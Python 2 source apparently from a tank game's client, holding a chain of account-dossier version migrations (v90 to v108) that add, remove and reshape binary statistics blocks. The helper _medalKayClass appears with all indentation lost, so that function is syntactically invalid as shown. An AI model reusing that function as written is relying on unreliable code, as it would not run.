              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut',
              'uniqueAchievements', 'fortBattles', 'maxFortBattles',
              'fortBattlesCut', 'fortSorties', 'maxFortSorties',
              'fortSortiesCut', 'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc',
              'fortMiscInClan', 'fortAchievements', 'singleAchievements',
              'clanAchievements', 'rated7x7', 'maxRated7x7',
              'achievementsRated7x7']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    addBlock(ctx, 'rated7x7Cut')
    setVersion(ctx, 91)
    return 91, ctx['dossierCompDescr']
def __updateFromAccountDossier91(compDescr):
    """Upgrade an account dossier from version 91 to 92 by adding the
    'testartilleryman' record to the achievements block.
    Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v91 account dossier.
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut',
              'uniqueAchievements', 'fortBattles', 'maxFortBattles',
              'fortBattlesCut', 'fortSorties', 'maxFortSorties',
              'fortSortiesCut', 'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc',
              'fortMiscInClan', 'fortAchievements', 'singleAchievements',
              'clanAchievements', 'rated7x7', 'maxRated7x7',
              'achievementsRated7x7', 'rated7x7Cut']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    addRecords(ctx, 'achievements', [('testartilleryman', 'H')], {})
    setVersion(ctx, 92)
    return 92, ctx['dossierCompDescr']
def _countBattleHeroesBasedOn7x7Medals(ctx):
    """Return the total count of 7x7 medals ('Wolf Among Sheep' and
    'Genius for War') stored in the 'achievements7x7' block of *ctx*.
    """
    # Byte offset and struct format of each medal counter in the block.
    packing = {'wolfAmongSheepMedal': (2, 'H'), 'geniusForWarMedal': (6, 'H')}
    medals = getStaticSizeBlockRecordValues(ctx, 'achievements7x7', packing)
    total = 0
    for count in medals.itervalues():
        total += count
    return total
def _medalKayClass(battleHeroes):
medalKayCfg = (1, 10, 100, 1000)
maxMedalClass = len(medalKayCfg)
for medalClass in xrange(1, maxMedalClass + 1):
if battleHeroes >= medalKayCfg[maxMedalClass - medalClass]:
break
else:
medalClass = 0
return medalClass
def __updateFromAccountDossier92(compDescr):
    """Upgrade an account dossier from version 92 to 93: fold 7x7 Battle
    Hero medals into the account-wide 'battleHeroes' counter and recompute
    the Kay medal class.  Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v92 account dossier.
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut',
              'uniqueAchievements', 'fortBattles', 'maxFortBattles',
              'fortBattlesCut', 'fortSorties', 'maxFortSorties',
              'fortSortiesCut', 'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc',
              'fortMiscInClan', 'fortAchievements', 'singleAchievements',
              'clanAchievements', 'rated7x7', 'maxRated7x7',
              'achievementsRated7x7', 'rated7x7Cut']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    heroes7x7 = _countBattleHeroesBasedOn7x7Medals(ctx)
    if heroes7x7 > 0:
        # Byte offsets of the touched records inside the achievements block.
        packing = {'battleHeroes': (20, 'H'), 'medalKay': (38, 'B')}
        records = getStaticSizeBlockRecordValues(ctx, 'achievements', packing)
        if records:
            records['battleHeroes'] += heroes7x7
            records['medalKay'] = _medalKayClass(records['battleHeroes'])
            setStaticSizeBlockRecordValues(ctx, 'achievements', packing, records)
    setVersion(ctx, 93)
    return 93, ctx['dossierCompDescr']
def __updateFromAccountDossier93(compDescr):
    """Upgrade an account dossier from version 93 to 94 by appending the
    four global-map blocks.  Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v93 account dossier.
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut',
              'uniqueAchievements', 'fortBattles', 'maxFortBattles',
              'fortBattlesCut', 'fortSorties', 'maxFortSorties',
              'fortSortiesCut', 'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc',
              'fortMiscInClan', 'fortAchievements', 'singleAchievements',
              'clanAchievements', 'rated7x7', 'maxRated7x7',
              'achievementsRated7x7', 'rated7x7Cut']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    addBlock(ctx, 'globalMapCommon')
    addBlock(ctx, 'globalMapMiddle')
    addBlock(ctx, 'globalMapChampion')
    addBlock(ctx, 'globalMapAbsolute')
    setVersion(ctx, 94)
    return 94, ctx['dossierCompDescr']
def __updateFromAccountDossier94(compDescr):
    """Upgrade an account dossier from version 94 to 95: drop the
    'globalMapCommon' block and add pre-9.0 accounting records to the
    three remaining global-map blocks.  Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v94 account dossier.
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut',
              'uniqueAchievements', 'fortBattles', 'maxFortBattles',
              'fortBattlesCut', 'fortSorties', 'maxFortSorties',
              'fortSortiesCut', 'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc',
              'fortMiscInClan', 'fortAchievements', 'singleAchievements',
              'clanAchievements', 'rated7x7', 'maxRated7x7',
              'achievementsRated7x7', 'rated7x7Cut', 'globalMapCommon',
              'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    removeBlock(ctx, 'globalMapCommon')
    legacyCounters = [('xpBefore8_9', 'I'),
                      ('battlesCountBefore8_9', 'I'),
                      ('battlesCountBefore9_0', 'I')]
    for blockName in ('globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute'):
        addRecords(ctx, blockName, legacyCounters, {})
    setVersion(ctx, 95)
    return 95, ctx['dossierCompDescr']
def __updateFromAccountDossier95(compDescr):
    """Upgrade an account dossier from version 95 to 96 by adding the
    per-league battle/win counters and the fort resource counter to the
    'fortSortiesInClan' block.  Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v95 account dossier.
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut',
              'uniqueAchievements', 'fortBattles', 'maxFortBattles',
              'fortBattlesCut', 'fortSorties', 'maxFortSorties',
              'fortSortiesCut', 'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc',
              'fortMiscInClan', 'fortAchievements', 'singleAchievements',
              'clanAchievements', 'rated7x7', 'maxRated7x7',
              'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle',
              'globalMapChampion', 'globalMapAbsolute']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    addRecords(ctx, 'fortSortiesInClan',
               [('middleBattlesCount', 'I'), ('championBattlesCount', 'I'),
                ('absoluteBattlesCount', 'I'), ('middleWins', 'I'),
                ('championWins', 'I'), ('absoluteWins', 'I'),
                ('fortResource', 'I')], {})
    setVersion(ctx, 96)
    return 96, ctx['dossierCompDescr']
def __updateFromAccountDossier96(compDescr):
    """Upgrade an account dossier from version 96 to 97 by appending the
    three max-global-map blocks.  Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v96 account dossier.
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut',
              'uniqueAchievements', 'fortBattles', 'maxFortBattles',
              'fortBattlesCut', 'fortSorties', 'maxFortSorties',
              'fortSortiesCut', 'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc',
              'fortMiscInClan', 'fortAchievements', 'singleAchievements',
              'clanAchievements', 'rated7x7', 'maxRated7x7',
              'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle',
              'globalMapChampion', 'globalMapAbsolute']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    addBlock(ctx, 'maxGlobalMapMiddle')
    addBlock(ctx, 'maxGlobalMapChampion')
    addBlock(ctx, 'maxGlobalMapAbsolute')
    setVersion(ctx, 97)
    return 97, ctx['dossierCompDescr']
def __updateFromAccountDossier97(compDescr):
    """Upgrade an account dossier from version 97 to 98 by appending the
    'globalMapCommonCut' block.  Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v97 account dossier.
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut',
              'uniqueAchievements', 'fortBattles', 'maxFortBattles',
              'fortBattlesCut', 'fortSorties', 'maxFortSorties',
              'fortSortiesCut', 'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc',
              'fortMiscInClan', 'fortAchievements', 'singleAchievements',
              'clanAchievements', 'rated7x7', 'maxRated7x7',
              'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle',
              'globalMapChampion', 'globalMapAbsolute', 'maxGlobalMapMiddle',
              'maxGlobalMapChampion', 'maxGlobalMapAbsolute']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    addBlock(ctx, 'globalMapCommonCut')
    setVersion(ctx, 98)
    return 98, ctx['dossierCompDescr']
def __updateFromAccountDossier98(compDescr):
    """Upgrade an account dossier from version 98 to 99 by appending the
    fallout statistics blocks.  Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v98 account dossier.
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut',
              'uniqueAchievements', 'fortBattles', 'maxFortBattles',
              'fortBattlesCut', 'fortSorties', 'maxFortSorties',
              'fortSortiesCut', 'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc',
              'fortMiscInClan', 'fortAchievements', 'singleAchievements',
              'clanAchievements', 'rated7x7', 'maxRated7x7',
              'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle',
              'globalMapChampion', 'globalMapAbsolute', 'maxGlobalMapMiddle',
              'maxGlobalMapChampion', 'maxGlobalMapAbsolute',
              'globalMapCommonCut']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    addBlock(ctx, 'fallout')
    addBlock(ctx, 'falloutCut')
    addBlock(ctx, 'maxFallout')
    setVersion(ctx, 99)
    return 99, ctx['dossierCompDescr']
def __updateFromAccountDossier99(compDescr):
    """Upgrade an account dossier from version 99 to 100 by appending the
    'falloutAchievements' block.  Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v99 account dossier.
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut',
              'uniqueAchievements', 'fortBattles', 'maxFortBattles',
              'fortBattlesCut', 'fortSorties', 'maxFortSorties',
              'fortSortiesCut', 'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc',
              'fortMiscInClan', 'fortAchievements', 'singleAchievements',
              'clanAchievements', 'rated7x7', 'maxRated7x7',
              'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle',
              'globalMapChampion', 'globalMapAbsolute', 'maxGlobalMapMiddle',
              'maxGlobalMapChampion', 'maxGlobalMapAbsolute',
              'globalMapCommonCut', 'fallout', 'falloutCut', 'maxFallout']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    addBlock(ctx, 'falloutAchievements')
    setVersion(ctx, 100)
    return 100, ctx['dossierCompDescr']
def __updateFromAccountDossier100(compDescr):
    """Upgrade an account dossier from version 100 to 101 by adding the
    EFC2016 event records to the achievements block.
    Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v100 account dossier.
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut',
              'uniqueAchievements', 'fortBattles', 'maxFortBattles',
              'fortBattlesCut', 'fortSorties', 'maxFortSorties',
              'fortSortiesCut', 'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc',
              'fortMiscInClan', 'fortAchievements', 'singleAchievements',
              'clanAchievements', 'rated7x7', 'maxRated7x7',
              'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle',
              'globalMapChampion', 'globalMapAbsolute', 'maxGlobalMapMiddle',
              'maxGlobalMapChampion', 'maxGlobalMapAbsolute',
              'globalMapCommonCut', 'fallout', 'falloutCut', 'maxFallout',
              'falloutAchievements']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    addRecords(ctx, 'achievements',
               [('EFC2016WinSeries', 'H'),
                ('maxEFC2016WinSeries', 'H'),
                ('EFC2016Goleador', 'H')], {})
    setVersion(ctx, 101)
    return 101, ctx['dossierCompDescr']
def __updateFromAccountDossier101(compDescr):
    """Upgrade an account dossier from version 101 to 102 by adding the
    Mark I centenary records to the achievements block.
    Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v101 account dossier.
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut',
              'uniqueAchievements', 'fortBattles', 'maxFortBattles',
              'fortBattlesCut', 'fortSorties', 'maxFortSorties',
              'fortSortiesCut', 'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc',
              'fortMiscInClan', 'fortAchievements', 'singleAchievements',
              'clanAchievements', 'rated7x7', 'maxRated7x7',
              'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle',
              'globalMapChampion', 'globalMapAbsolute', 'maxGlobalMapMiddle',
              'maxGlobalMapChampion', 'maxGlobalMapAbsolute',
              'globalMapCommonCut', 'fallout', 'falloutCut', 'maxFallout',
              'falloutAchievements']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    addRecords(ctx, 'achievements',
               [('markIBomberman', 'H'),
                ('markIRepairer', 'H'),
                ('markI100Years', 'B')], {})
    setVersion(ctx, 102)
    return 102, ctx['dossierCompDescr']
def __updateFromAccountDossier102(compDescr):
    """Upgrade an account dossier from version 102 to 103 by adding the
    stun-related records to every per-mode statistics block.
    Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v102 account dossier.
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut',
              'uniqueAchievements', 'fortBattles', 'maxFortBattles',
              'fortBattlesCut', 'fortSorties', 'maxFortSorties',
              'fortSortiesCut', 'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc',
              'fortMiscInClan', 'fortAchievements', 'singleAchievements',
              'clanAchievements', 'rated7x7', 'maxRated7x7',
              'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle',
              'globalMapChampion', 'globalMapAbsolute', 'maxGlobalMapMiddle',
              'maxGlobalMapChampion', 'maxGlobalMapAbsolute',
              'globalMapCommonCut', 'fallout', 'falloutCut', 'maxFallout',
              'falloutAchievements']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    # Every mode block that gets the new stun statistics.
    for mode in ('a15x15_2', 'clan2', 'company2', 'a7x7', 'historical',
                 'fortBattles', 'fortSorties', 'rated7x7', 'fallout',
                 'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute'):
        stunRecords = [('battlesOnStunningVehicles', 'I'),
                       ('stunNum', 'I'),
                       ('damageAssistedStun', 'I')]
        addRecords(ctx, mode, stunRecords, {})
    setVersion(ctx, 103)
    return 103, ctx['dossierCompDescr']
def __updateFromAccountDossier103(compDescr):
    """Upgrade an account dossier from version 103 to 104 by adding the
    stun-related records to the in-clan fort blocks — but only where the
    block is still at its pre-stun size (so already-extended blocks are
    not extended twice).  Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v103 account dossier.
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut',
              'uniqueAchievements', 'fortBattles', 'maxFortBattles',
              'fortBattlesCut', 'fortSorties', 'maxFortSorties',
              'fortSortiesCut', 'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc',
              'fortMiscInClan', 'fortAchievements', 'singleAchievements',
              'clanAchievements', 'rated7x7', 'maxRated7x7',
              'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle',
              'globalMapChampion', 'globalMapAbsolute', 'maxGlobalMapMiddle',
              'maxGlobalMapChampion', 'maxGlobalMapAbsolute',
              'globalMapCommonCut', 'fallout', 'falloutCut', 'maxFallout',
              'falloutAchievements']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    # (block, full format once the stun records are present)
    for blockName, fullFormat in (
            ('fortBattlesInClan', '<IIIIIIIIIIIIIIIIIIIIIIIIIIIII'),
            ('fortSortiesInClan', '<IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII')):
        if getBlockSize(ctx, blockName) < struct.calcsize(fullFormat):
            stunRecords = [('battlesOnStunningVehicles', 'I'),
                           ('stunNum', 'I'),
                           ('damageAssistedStun', 'I')]
            addRecords(ctx, blockName, stunRecords, {})
    setVersion(ctx, 104)
    return 104, ctx['dossierCompDescr']
def __updateFromAccountDossier104(compDescr):
    """Upgrade an account dossier from version 104 to 105 by appending the
    full set of ranked-battle blocks.  Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v104 account dossier.
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut',
              'uniqueAchievements', 'fortBattles', 'maxFortBattles',
              'fortBattlesCut', 'fortSorties', 'maxFortSorties',
              'fortSortiesCut', 'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc',
              'fortMiscInClan', 'fortAchievements', 'singleAchievements',
              'clanAchievements', 'rated7x7', 'maxRated7x7',
              'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle',
              'globalMapChampion', 'globalMapAbsolute', 'maxGlobalMapMiddle',
              'maxGlobalMapChampion', 'maxGlobalMapAbsolute',
              'globalMapCommonCut', 'fallout', 'falloutCut', 'maxFallout',
              'falloutAchievements']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    # Append order matters: it defines the new blocks' header positions.
    for newBlock in ('ranked', 'maxRanked', 'rankedCut', 'rankedBadges',
                     'rankedSeasons', 'rankedCurrent', 'rankedPrevious',
                     'maxRankedCurrent', 'maxRankedPrevious',
                     'rankedCurrentCut', 'rankedPreviousCut',
                     'rankedCurrentCycle', 'rankedPreviousCycle'):
        addBlock(ctx, newBlock)
    setVersion(ctx, 105)
    return 105, ctx['dossierCompDescr']
def __updateFromAccountDossier105(compDescr):
    """Upgrade an account dossier from version 105 to 106: drop the fort
    misc blocks and remove the obsolete per-league records from
    'fortSortiesInClan' and 'fortAchievements'.
    Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v105 account dossier.
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut',
              'uniqueAchievements', 'fortBattles', 'maxFortBattles',
              'fortBattlesCut', 'fortSorties', 'maxFortSorties',
              'fortSortiesCut', 'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc',
              'fortMiscInClan', 'fortAchievements', 'singleAchievements',
              'clanAchievements', 'rated7x7', 'maxRated7x7',
              'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle',
              'globalMapChampion', 'globalMapAbsolute', 'maxGlobalMapMiddle',
              'maxGlobalMapChampion', 'maxGlobalMapAbsolute',
              'globalMapCommonCut', 'fallout', 'falloutCut', 'maxFallout',
              'falloutAchievements', 'ranked', 'maxRanked', 'rankedCut',
              'rankedBadges', 'rankedSeasons', 'rankedCurrent',
              'rankedPrevious', 'maxRankedCurrent', 'maxRankedPrevious',
              'rankedCurrentCut', 'rankedPreviousCut', 'rankedCurrentCycle',
              'rankedPreviousCycle']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    removeBlock(ctx, 'fortMisc')
    removeBlock(ctx, 'fortMiscInClan')
    # Byte offsets of the dropped per-league records in fortSortiesInClan.
    sortiesPacking = {'middleBattlesCount': (116, 'I'),
                      'championBattlesCount': (120, 'I'),
                      'absoluteBattlesCount': (124, 'I'),
                      'middleWins': (128, 'I'),
                      'championWins': (132, 'I'),
                      'absoluteWins': (136, 'I'),
                      'fortResource': (140, 'I')}
    removeRecords(ctx, 'fortSortiesInClan', sortiesPacking)
    # Byte offsets of the dropped records in fortAchievements.
    achievementsPacking = {'wins': (8, 'H'),
                           'capturedBasesInAttack': (10, 'H'),
                           'capturedBasesInDefence': (12, 'H')}
    removeRecords(ctx, 'fortAchievements', achievementsPacking)
    setVersion(ctx, 106)
    return 106, ctx['dossierCompDescr']
def __updateFromAccountDossier106(compDescr):
    """Upgrade an account dossier from version 106 to 107 by appending the
    30x30 (grand battle) blocks.  Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v106 account dossier (fortMisc blocks were
    # removed by the previous migration).
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut',
              'uniqueAchievements', 'fortBattles', 'maxFortBattles',
              'fortBattlesCut', 'fortSorties', 'maxFortSorties',
              'fortSortiesCut', 'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan',
              'fortAchievements', 'singleAchievements', 'clanAchievements',
              'rated7x7', 'maxRated7x7', 'achievementsRated7x7',
              'rated7x7Cut', 'globalMapMiddle', 'globalMapChampion',
              'globalMapAbsolute', 'maxGlobalMapMiddle',
              'maxGlobalMapChampion', 'maxGlobalMapAbsolute',
              'globalMapCommonCut', 'fallout', 'falloutCut', 'maxFallout',
              'falloutAchievements', 'ranked', 'maxRanked', 'rankedCut',
              'rankedBadges', 'rankedSeasons', 'rankedCurrent',
              'rankedPrevious', 'maxRankedCurrent', 'maxRankedPrevious',
              'rankedCurrentCut', 'rankedPreviousCut', 'rankedCurrentCycle',
              'rankedPreviousCycle']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    addBlock(ctx, 'a30x30')
    addBlock(ctx, 'a30x30Cut')
    addBlock(ctx, 'max30x30')
    setVersion(ctx, 107)
    return 107, ctx['dossierCompDescr']
def __updateFromAccountDossier107(compDescr):
    """Upgrade an account dossier from version 107 to 108.

    Shrinks every 'a15x15Cut' item from five to four uint32 fields by
    dropping the fourth field (the mark-of-mastery value), and moves
    each non-zero dropped value into a new 'markOfMasteryCut' block
    keyed by the item's first field.  Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v107 account dossier; positions must match
    # the serialized header exactly.
    blocksLayout = [
        'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'vehTypeFrags',
        'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7', 'achievements7x7', 'historical',
        'maxHistorical', 'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
        'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut', 'fortBattlesInClan',
        'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan',
        'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7',
        'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute',
        'maxGlobalMapMiddle', 'maxGlobalMapChampion', 'maxGlobalMapAbsolute', 'globalMapCommonCut', 'fallout',
        'falloutCut', 'maxFallout', 'falloutAchievements',
        'ranked', 'maxRanked', 'rankedCut', 'rankedBadges', 'rankedSeasons', 'rankedCurrent', 'rankedPrevious',
        'maxRankedCurrent', 'maxRankedPrevious', 'rankedCurrentCut', 'rankedPreviousCut', 'rankedCurrentCycle',
        'rankedPreviousCycle', 'a30x30', 'a30x30Cut', 'max30x30']
    updateCtx = {'dossierCompDescr': compDescr,
     'blockSizeFormat': 'H',
     'versionFormat': 'H',
     'blocksLayout': blocksLayout
    }
    getHeader(updateCtx)
    a15x15Cut = getBlockCompDescr(updateCtx, 'a15x15Cut')
    # Defaults used when the a15x15Cut block is empty: an empty
    # markOfMasteryCut block is still appended below.
    markOfMasteryCutBlockFormat = ''
    markOfMasteryCutBlockValues = None
    if a15x15Cut:
        # Old item layout: one uint32 key followed by four uint32 values.
        keyFormat, valueFormat = ('I', 'IIII')
        itemFormat = keyFormat + valueFormat
        itemSize = struct.calcsize('<' + itemFormat)
        # Python 2 integer division: number of whole items in the block.
        length = len(a15x15Cut) / itemSize
        fmt = '<' + itemFormat * length
        values = struct.unpack(fmt, a15x15Cut)
        newValues = []
        markOfMasteryCutBlockFormat = '<'
        markOfMasteryCutBlockValues = []
        itemLength = len(itemFormat)
        idx = 0
        for i in xrange(length):
            items = values[idx:idx + itemLength]
            # Keep the key and fields 1, 2 and 4; drop field 3 (index 3),
            # the mark-of-mastery value.
            newValues += items[:3] + items[4:]
            if items[3] != 0:
                # Non-zero mastery mark: store (key uint32, mark uint8) in
